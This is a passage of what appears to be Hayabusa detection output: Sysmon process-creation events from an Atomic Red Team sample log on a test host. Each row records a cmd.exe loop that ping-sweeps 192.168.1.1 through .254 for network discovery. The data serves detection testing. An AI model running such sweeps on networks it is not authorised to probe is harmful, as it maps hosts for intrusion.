100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 
100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:50.507 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 
747F3D96-D908-5D31-0000-0010C45F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 
0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 
-w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l 
%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process 